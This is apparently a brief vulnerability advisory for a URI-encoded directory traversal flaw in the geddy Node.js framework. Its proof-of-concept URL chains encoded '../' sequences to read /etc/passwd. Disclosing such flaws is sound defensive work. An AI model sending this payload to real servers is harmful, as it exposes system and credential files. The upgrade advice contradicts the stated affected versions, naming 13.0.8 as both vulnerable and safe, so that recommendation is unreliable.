Directory Traversal

2015-07-27T23:33:48
ID NODEJS:10
Type nodejs
Reporter Vikram Chaitanya
Modified 2018-05-08T14:27:02

Description

Overview

Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.

Proof of Concept

http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Recommendation

Update geddy to version >= 13.0.8

References

  • https://github.com/geddy/geddy/issues/697
  • https://github.com/geddy/geddy/pull/699